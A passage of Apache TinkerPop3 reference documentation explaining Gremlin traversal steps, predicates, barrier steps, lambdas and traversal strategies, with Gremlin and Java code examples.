)).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select('a','b','c')\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select('a','b').by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b').by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select('a','b'). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select('a','b').by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are three results in the `store()` side-effect even though the interval selection is for 2 objects. Realize that when the third object is on its way to the `range()` filter (i.e. `[0..1]`), it passes through `store()` and thus, stored before filtered.\n\n[gremlin-groovy,modern]\n----\ng.E().store('x').by('weight').cap('x')\n----\n\n[[subgraph-step]]\nSubgraph Step\n~~~~~~~~~~~~~\n\nimage::subgraph-logo.png[width=380]\n\nExtracting a portion of a graph from a larger one for analysis, visualization or other purposes is a fairly common use case for graph analysts and developers. The `subgraph()`-step (*sideEffect*) provides a way to produce an link:http:\/\/mathworld.wolfram.com\/Edge-InducedSubgraph.html[edge-induced subgraph] from virtually any traversal. The following example demonstrates how to produce the \"knows\" subgraph:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.E().hasLabel('knows').subgraph('subGraph').cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E() <2>\n----\n\n<1> As this function produces \"edge-induced\" subgraphs, `subgraph()` must be called at edge steps.\n<2> The subgraph contains only \"knows\" edges.\n\nA more common subgraphing use case is to get all of the graph structure surrounding a single vertex:\n\n[gremlin-groovy,modern]\n----\nsubGraph = g.V(3).repeat(__.inE().subgraph('subGraph').outV()).times(3).cap('subGraph').next() <1>\nsg = subGraph.traversal(standard())\nsg.E()\n----\n\n<1> Starting at vertex `3`, traverse 3 steps away on in-edges, outputting all of that into the subgraph.\n\nThere can be multiple `subgraph()` calls within the same traversal. Each operating against either the same graph (i.e. same side-effect key) or different graphs (i.e. different side-effect keys).\n\n[gremlin-groovy,modern]\n----\nt = g.V().outE('knows').subgraph('knowsG').inV().outE('created').subgraph('createdG').\n inV().inE('created').subgraph('createdG').iterate()\nt.sideEffects.get('knowsG').get().traversal(standard()).E()\nt.sideEffects.get('createdG').get().traversal(standard()).E()\n----\n\nIMPORTANT: The `subgraph()`-step only writes to graphs that support user supplied ids for its elements. Moreover, if no graph is specified via `withSideEffect()`, then <<tinkergraph-gremlin,TinkerGraph>> is assumed.\n\n[[sum-step]]\nSum Step\n~~~~~~~~\n\nThe `sum()`-step (*map*) operates on a stream of numbers and sums the numbers together to yield a double. Note that the current traverser number is multiplied by the traverser bulk to determine how many such numbers are being represented.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').sum()\ng.V().repeat(both()).times(3).values('age').sum()\n----\n\nIMPORTANT: `sum(local)` determines the sum of the current, local object (not the objects in the traversal stream). This works for `Collection`-type objects. For any other object, a sum of `Double.NaN` is returned.\n\n[[tail-step]]\nTail Step\n~~~~~~~~~\n\nimage::tail-step.png[width=530]\n\nThe `tail()`-step is analogous to <<limit-step,`limit()`>>-step, except that it emits the last `n`-objects instead of the first `n`-objects.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().tail() <1>\ng.V().values('name').order().tail(1) <2>\ng.V().values('name').order().tail(3) <3>\n----\n\n<1> Last name (alphabetically).\n<2> Same as statement 1.\n<3> Last three names.\n\nThe `tail()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('a').out().as('a').select('a').by(tail(local)).values('name') <1>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local) <2>\ng.V().as('a').out().as('a').out().as('a').select('a').by(unfold().values('name').fold()).tail(local, 2) <3>\ng.V().valueMap().tail(local) <4>\n----\n\n<1> Only the most recent name from the \"a\" step (`List<Vertex>` becomes `Vertex`).\n<2> Same result as statement 1 (`List<String>` becomes `String`).\n<3> `List<String>` for each path containing the last two names from the 'a' step.\n<4> `Map<String, Object>` for each vertex, but containing only the last property value.\n\n[[timelimit-step]]\nTimeLimit Step\n~~~~~~~~~~~~~~\n\nIn many situations, a graph traversal is not about getting an exact answer as its about getting a relative ranking. A classic example is link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation]. What is desired is a relative ranking of vertices, not their absolute rank. Next, it may be desirable to have the traversal execute for no more than 2 milliseconds. In such situations, `timeLimit()`-step (*filter*) can be used.\n\nimage::timelimit-step.png[width=400]\n\nNOTE: The method `clock(int runs, Closure code)` is a utility preloaded in the <<gremlin-console,Gremlin Console>> that can be used to time execution of a body of code.\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\ng.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()\nclock(1) {g.V().repeat(timeLimit(2).both().groupCount('m')).times(16).cap('m').order(local).by(valueDecr).next()}\n----\n\nIn essence, the relative order is respected, even through the number of traversers at each vertex is not. The primary benefit being that the calculation is guaranteed to complete at the specified time limit (in milliseconds). Finally, note that the internal clock of `timeLimit()`-step starts when the first traverser enters it. When the time limit is reached, any `next()` evaluation of the step will yield a `NoSuchElementException` and any `hasNext()` evaluation will yield `false`.\n\n[[tree-step]]\nTree Step\n~~~~~~~~~\n\nFrom any one element (i.e. vertex or edge), the emanating paths from that element can be aggregated to form a link:http:\/\/en.wikipedia.org\/wiki\/Tree_(data_structure)[tree]. Gremlin provides `tree()`-step (*sideEffect*) for such this situation.\n\nimage::tree-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().next()\n----\n\nIt is important to see how the paths of all the emanating traversers are united to form the tree.\n\nimage::tree-step2.png[width=500]\n\nThe resultant tree data structure can then be manipulated (see `Tree` JavaDoc).\n\n[gremlin-groovy,modern]\n----\ntree = g.V().out().out().tree().by('name').next()\ntree['marko']\ntree['marko']['josh']\ntree.getObjectsAtDepth(3)\n----\n\n[[unfold-step]]\nUnfold Step\n~~~~~~~~~~~\n\nIf the object reaching `unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used to for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(count(local).is(1)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which are support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` is desired, then a boolean triggers its insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, its possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()` : Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjuction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a',['josh','peter']).V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\nA few more examples of filtering an arbitrary object based on a anonymous traversal is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().where(out('created')).values('name') <1>\ng.V().out('knows').where(out('created')).values('name') <2>\ng.V().where(out('created').count().is(gte(2))).values('name') <3>\ng.V().where(out('knows').where(out('created'))).values('name') <4>\ng.V().where(__.not(out('created'))).where(__.in('knows')).values('name') <5>\ng.V().where(__.not(out('created')).and().in('knows')).values('name') <6>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone one and have created a project?\n<3> What are the names of the people how have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)\n<5> What are the names of the people who have not created anything, but are known by someone?\n<6> The concatenation of `where()`-steps is the same as a single `where()`-step with an and'd clause.\n\nWARNING: The anonymous traversal of `where()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[a-note-on-predicates]]\nA Note on Predicates\n--------------------\n\nA `P` is a predicate of the form `Function<Object,Boolean>`. That is, given some object, return true or false. The provided predicates are outlined in the table below and are used in various steps such as <<has-step,`has()`>>-step, <<where-step,`where()`>>-step, <<is-step,`is()`>>-step, etc.\n\n[width=\"100%\",cols=\"3,15\",options=\"header\"]\n|=========================================================\n| Predicate | Description\n| `eq(object)` | Is the incoming object equal to the provided object?\n| `neq(object)` | Is the incoming object not equal to the provided object?\n| `lt(number)` | Is the incoming number less than the provided number?\n| `lte(number)` | Is the incoming number less than or equal to the provided number?\n| `gt(number)` | Is the incoming number greater than the provided number?\n| `gte(number)` | Is the incoming number greater than or equal to the provided number?\n| `inside(number,number)` | Is the incoming number greater than the first provided number and less than the second?\n| `outside(number,number)` | Is the incoming number less than the first provided number and greater than the second?\n| `between(number,number)` | Is the incoming number greater than or equal to the first provided number and less than the second?\n| `within(objects...)` | Is the incoming object in the array of provided objects?\n| `without(objects...)` | Is the incoming object not in the array of the provided objects?\n|=========================================================\n\n[gremlin-groovy]\n----\neq(2)\nnot(neq(2)) <1>\nnot(within('a','b','c'))\nnot(within('a','b','c')).test('d') <2>\nnot(within('a','b','c')).test('a')\nwithin(1,2,3).and(not(eq(2))).test(3) <3>\ninside(1,4).or(eq(5)).test(3) <4>\ninside(1,4).or(eq(5)).test(5)\nbetween(1,2) <5>\nnot(between(1,2))\n----\n\n<1> The `not()` of a `P`-predicate is another `P`-predicate.\n<2> `P`-predicates are arguments to various steps which internally `test()` the incoming value.\n<3> `P`-predicates can be and'd together.\n<4> `P`-predicates can be or' together.\n<5> `and()` is a `P`-predicate and thus, a `P`-predicate can be composed of multiple `P`-predicates.\n\nFinally, note that <<where-step,`where()`>>-step takes a `P<String>`. The provided string value refers to a variable binding, not to the explicit string value.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').both().both().as('b').count()\ng.V().as('a').both().both().as('b').where('a',neq('b')).count()\n----\n\nNOTE: It is possible for vendors and users to extend `P` and provide new predicates. For instance, a `regex(pattern)` could be a vendor-specific `P`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start\/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a \"barrier step\" exists. There are three types of barriers:\n\n . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being \"drained\" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>, <<barrier-step,`barrier()`>>.\n . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single \"reduced value\" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.\n . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.\n\nIn Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What is can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.\n\n[[a-note-on-lambdas]]\nA Note On Lambdas\n-----------------\n\nimage:lambda.png[width=150,float=right] A link:http:\/\/en.wikipedia.org\/wiki\/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users only leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason being, lambdas can not be optimized by Gremlin's compiler strategies as they can not be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields less objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).\n * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).\n * There are are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic final class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream().forEach(identityStep -> {\n final Step<?, ?> previousStep = identityStep.getPreviousStep();\n if (!(previousStep instanceof EmptyStep) || identityStep.getLabels().isEmpty()) {\n ((IdentityStep<?>) identityStep).getLabels().forEach(previousStep::addLabel);\n traversal.removeStep(identityStep);\n }\n });\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, then the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, vendor-optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` categories are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its prior and posts can reference strategies within any category.\n\nAn example of a `VendorOptimizationStrategy` is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in a `O(|V|)` or `O(log(|V|)` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (currentStep instanceof HasContainerHolder) {\n ((HasContainerHolder) currentStep).getHasContainers().forEach(tinkerGraphStep::addHasContainer);\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then its up to `TinkerGraphStep` to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nCAUTION: The reason that `OptimizationStrategy` and `VendorOptimizationStrategy` are two different categories is that optimization strategies should only rewrite the traversal using TinkerPop3 steps. This ensures that the optimizations executed at the end of the optimization strategy round are TinkerPop3 compliant. From there, vendor optimizations can analyze the traversal and rewrite the traversal as desired using vendor specific steps (e.g. replacing `GraphStep.HasStep...HasStep` with `TinkerGraphStep`). If vendor's optimizations use vendor-specific steps and implement `OptimizationStrategy`, then other TinkerPop3 optimizations may fail to optimize the traversal or mis-understand the vendor-specific step behaviors (e.g. `VendorVertexStep extends VertexStep`) and yield incorrect semantics.\n\nA collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV().property(id,'42a').next()\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indicies under the hood.\n\n[gremlin-groovy]\n----\ngraph = Neo4jGraph.open('\/tmp\/neo4j')\nstrategy = ElementIdStrategy.build().create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV().property(id, '42a').id()\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal` first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nBy default, the `EventStrategy` is configured with an `EventQueue` that raises events as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised. The strategy can also be configured with a `TransactionalEventQueue` that captures the changes within a transaction and does not allow them to fire until the transaction is committed.\n\nCAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary configurations in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nPartitions may also extend to `VertexProperty` elements if the `Graph` can support meta-properties and if the `includeMetaProperties` value is set to `true` when the `PartitionStrategy` is built. The `partitionKey` will be stored in the meta-properties of the `VertexProperty` and blind the traversal to those properties. Please note that the `VertexProperty` will only be hidden by way of the `Traversal` itself. For example, calling `Vertex.property(k)` bypasses the context of the `PartitionStrategy` and will thus allow all properties to be accessed.\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Traversal` criterion defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategy = SubgraphStrategy.build().edgeCriterion(hasId(8,9,10)).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as no filter for vertices was specified\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nThis strategy is implemented such that the vertices attached to an `Edge` must both satisfy the 